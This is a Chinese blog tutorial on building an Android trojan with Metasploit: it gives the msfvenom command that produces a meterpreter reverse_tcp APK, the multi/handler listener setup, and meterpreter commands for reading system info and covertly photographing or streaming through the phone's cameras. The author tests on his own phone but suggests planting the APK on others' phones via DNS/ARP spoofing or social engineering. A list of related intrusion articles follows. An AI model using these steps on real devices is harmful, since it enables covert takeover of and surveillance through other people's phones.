美文网首页
MSF入侵Android手机

MSF入侵Android手机

作者: Safesonic | 来源:发表于2016-08-10 10:57 被阅读4088次

MSF是Metasploit Framework的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。

我这里做测试的系统是Backbox linux ,这是一款网络渗透,信息安全评估系统。里边安装了许许多多的工具。其中MSF就自带有。当然还有其它的 比如Kali linux 、Back Track这些等等。

环境:Backbox linux+MSF

目标:一台安卓手机

既然是入侵安卓手机,肯定要先配置一个安卓木马,那我们看看本机的IP

本机IP:192.168.1.6

在到终端输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > /root/apk.apk

以前的MSF老版本是用msfpayload生成木马 现在在新版本中都用msfvenom代替了,所以有些朋友在终端输入msfpayload的时候 会提示

msfpayload无法找到命令 所以使用msfvenom即可,这里LHOST 对应的是本机的IP地址 LPORT对应你要监听的端口 然后生成木马的路径

这样我们就在/root/路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈。现在我们在来启动MSF工具

输入命令:msfconsole

然后输入:

1. use exploit/multi/handler 加载模块

2. set payload android/meterpreter/reverse_tcp  选择Payload

3.show options 查看参数设置

我们看见payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444 现在我们来更改设置

1.set LHOST 192.168.1.6 这里的地址设置成我们刚才生成木马的IP地址

2.set LPORT 5555 这里的端口设置成刚才我们生成木马所监听的端口

3.exploit 开始执行漏洞 开始监听...

OK,一切准备工作准备就绪。。。现在要做的就是把木马文件搞到人家的手机上,思路有很多 可以DNS arp劫持欺骗 只要对方用手机下载文件 就会下载我们的木马文件

还有社工什么等等的,这里我就简单的把木马文件弄我自己的手机上做测试

安装完成后 会在桌面上生成一个MainActivity的程序图标 这个就是我们刚才生成的木马 当我们点击了这个图标 手机会没有任何反应 其实木马已经开始运行起来了

我们可以在我们的MSF里看见有一个会话连接了

这样对方的手机就就被我们控制了,查看手机系统信息,输入命令 sysinfo

webcam_list查看手机摄影头有几个 这里显示两项 分别表示有前后两个摄像头

webcam_snap 隐秘拍照功能

后边跟上参数-i 指定使用那个摄像头拍照

可以看见我们分别对前后摄像头都拍了照 保存到了桌面上

还可以输入命令 webcam_stream 开启摄像头

相关文章

  • MSF入侵Android手机

    MSF是Metasploit Framework的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大...

  • android平台入侵测试

    在学习过程中,发现一篇入侵android文章,本着学习为主的态度,通过自己手机实际测试一下,入侵主要思路通过msf...

  • MSF入侵Windows

    1.打开一个shell 输入ifconfig 确定自己的Linux是连上网的 并查看本机IP...bt5、kali...

  • Msf+Ettercap入侵邻居安卓手机

    前言: 连别人的wifi不搞事情怎么可能?最近在学zANTI,不过不熟,咱们依旧kali走起。 做案工具: Kal...

  • 手机入侵

    (转自写作群里的一篇文章,话题觉得值得深思) 记得上大学时,参加过一次辩论赛,辩题是“手机使人们之间的距...

  • msf生成后门程序入侵windows电脑

    1.kali生成后门程序 msfvenom -p windows/meterpreter/reverse_tcp ...

  • 黑客攻击之后门植入

    声明:谢绝一切形式的转载,禁止用作非法目的 当通过木马或者漏洞成功入侵别人电脑后,由于MSF发起的攻击都是基于内存...

  • msf派生shell到cs

    1 msf获取shell 这里已经在用msf生成了exe 然后直接msf开启监听然后获取shell msf生成ex...

  • 外星手机入侵

    杨歌捡到了一部手机,大哥大。它竟然会说话。原来它是手机星球的人,名字叫安,安不断的进化,很快成了十几年后才会...

  • 【渗透测试】-工具之MSF

    0x01:msf msf是一款漏洞利用平台的工具 0x02:使用msf提权 生成反弹执行文件或脚本 加载msf,监...

网友评论

      本文标题:MSF入侵Android手机

      本文链接:https://www.haomeiwen.com/subject/ksxjsttx.html